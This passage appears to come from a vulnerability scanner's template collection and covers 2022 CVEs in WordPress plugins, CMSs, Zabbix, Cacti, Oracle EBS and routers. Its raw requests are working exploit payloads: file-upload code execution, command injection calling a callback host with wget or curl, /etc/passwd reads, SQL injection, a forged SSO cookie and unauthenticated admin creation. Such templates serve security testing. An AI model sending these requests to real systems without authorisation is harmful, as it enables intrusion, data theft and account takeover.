value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-46020","info":{"name":"WBCE CMS v1.5.4 -  Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/index.php?advanced=yes HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n","POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"reqid\"\n\ntest\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho md5(\"CVE-2022-46020\");\n\n?>\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"mtime[]\"\n\ntest\n-----------------------------213974337328367932543216511988--\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_6","words":["751a8ba516522786d551075a092a7a84"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0288","info":{"name":"WordPress Ad Inserter <2.7.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"body":"html_element_selection=</script><img+src+onerror=alert(document.domain)>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","ad-inserter"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1946","info":{"name":"WordPress Gallery <2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23131","info":{"name":"Zabbix - SAML SSO Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/index_sso.php","{{BaseURL}}/index_sso.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(header), 'location: zabbix.php?action=dashboard.view')"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-43164","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-27849","info":{"name":"WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Chat Log\"","\"User IP\"","\"User ID\""],"condition":"and"},{"type":"word","part":"header","words":["text/csv"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0679","info":{"name":"WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=narnoo_distributor_lib_request&lib_path=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2486","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-43167","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-28955","info":{"name":"D-Link DIR-816L - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/category_view.php","{{BaseURL}}/folder_view.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>SharePort Web Access</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1724","info":{"name":"WordPress Simple Membership <4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>\","]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38467","info":{"name":"CRM Perks Forms < 1.1.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(content_type_2, \"text/html\")","contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-46934","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls"],"matchers-condition":"and","matchers":[{"type":"word","words":["document.getElementById(\"http://\");alert(document.domain);//\").click();","viewer.min.css"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25485","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertLightbox.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21587","info":{"name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\nM=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\nM,BTR,34X-R([\"G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI=\"`P.PH*4$L!`A0#\nM%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````\"XN+RXN\nM+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R\nG:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n`\nend\n------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n","GET /OA_CGI/FNDWRR.exe HTTP/1.1\nHost: {{Hostname}}\n","POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;`I02P$\"%`,4``````!M<#16DP;7,@$````!````0P``````````\nM````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5\"4RUA\nM<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`\n(``!B````````\n`\nend\n"],"matchers":[{"type":"word","part":"body_2","words":["Nuclei-CVE-2022-21587"]}]}]},{"id":"CVE-2022-37191","info":{"name":"Cuppa CMS v1.0 - Authenticated Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","part":"body_3","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-22954","info":{"name":"VMware Workspace ONE Access - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Authorization context is not valid"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-24681","info":{"name":"ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /servlet/GetProductVersion HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(buildnumber, '< 6121')"]},{"type":"word","part":"body","words":["ManageEngine"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"buildnumber","group":1,"regex":["\"BUILD_NUMBER\":\"([0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0968","info":{"name":"Microweber <1.2.12 - Integer Overflow","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1\nHost: {{Hostname}}\n","POST /api/user/2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nthumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,'\\\"first_name\\\":\\\"{{payload}}\\\"')","status_code_3==200","contains(header_3,\"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"token\" value=\"(.*)\" autocomplete=\"off\">"],"internal":true,"part":"body"},{"type":"regex","name":"user","group":1,"regex":["<input type=\"text\" class=\"form-control\" name=\"username\" value=\"(.*)\">"],"internal":true,"part":"body"},{"type":"regex","name":"email","group":1,"regex":["<input type=\"email\" class=\"form-control\" name=\"email\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-32429","info":{"name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SSID1"]},{"type":"regex","part":"header","regex":["filename=\"Settings(.*).dat","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0952","info":{"name":"WordPress Sitemap by click5 <1.0.36 - Missing Authorization","severity":"high"},"requests":[{"raw":["POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"1\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"default_role\":\"administrator\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"0\"}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","status_code == 200","contains(body_1, 'users_can_register')","contains(body_2, 'default_role')"],"condition":"and"}]}]},{"id":"CVE-2022-42746","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-26148","info":{"name":"Grafana & Zabbix Integration - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redirect=%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zabbix\":","\"zbx\":","alexanderzobnin-zabbix-datasource"],"condition":"or"},{"type":"regex","part":"body","regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\"","\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php"]}]}]},{"id":"CVE-2022-22536","info":{"name":"SAP Memory Pipes (MPI) Desynchronization","severity":"critical"},"requests":[{"raw":["GET {{sap_path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 82646\nConnection: keep-alive\n\n{{repeat(\"A\", 82642)}}\n\nGET / HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"sap_path":["/sap/admin/public/default.html","/sap/public/bc/ur/Login/assets/corbu/sap_logo.png"]},"stop-at-first-match":true,"unsafe":true,"read-all":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(body), 'administration')","contains(tolower(header), 'content-type: image/png')"],"condition":"or"},{"type":"word","part":"body","words":["HTTP/1.0 400 Bad Request","HTTP/1.0 500 Internal Server Error","HTTP/1.0 500 Dispatching Error"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42094","info":{"name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_id\"\n\ncard_node_form\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-13\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[time]\"\n\n21:49:36\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"comment\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryWEcZgRB4detkrGaY--\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-0867","info":{"name":"WordPress ARPrice <3.6.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)\n","GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"text/html\")","contains(body_2, \"ArpPriceTable\")"],"condition":"and"}]}]},{"id":"CVE-2022-1386","info":{"name":"WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\naction=fusion_form_update_view\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"formData\"\n\nemail=example%40example.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva\ncy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"action\"\n\nfusion_form_submit_form_to_url\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusion_form_nonce\"\n\n{{fusionformnonce}}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"form_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"post_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"field_labels\"\n\n{\"email\":\"Email address\"}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"hidden_field_names\"\n\n[]\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionAction\"\n\nhttps://oast.me\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionActionMethod\"\n\nGET\n-----------------------------30259827232283860776499538268--\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Interactsh Server"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"fusionformnonce","internal":true,"xpath":["//*[@id=\"fusion-form-nonce-0\"]"],"attribute":"value","part":"body_1"}]}]},{"id":"CVE-2022-25369","info":{"name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Success\": true","\"Success\":true"],"condition":"or"},{"type":"word","part":"header","words":["application/json","ASP.NET_SessionId"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46169","info":{"name":"Cacti <=1.2.22 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 127.0.0.1\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"value\":","\"local_data_id\":"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0785","info":{"name":"WordPress Daily Prayer Time <2022.03.01 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"dptTimetable customStyles dptUserStyles\")"],"condition":"and"}]}]},{"id":"CVE-2022-4063","info":{"name":"WordPress InPost Gallery <2.1.4.1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30776","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error: 1<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48165","info":{"name":"Wavlink - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password=","Login="],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password=([^\\s]+)"]}]}]},{"id":"CVE-2022-31299","info":{"name":"Haraj 3.7 - Cross-Site 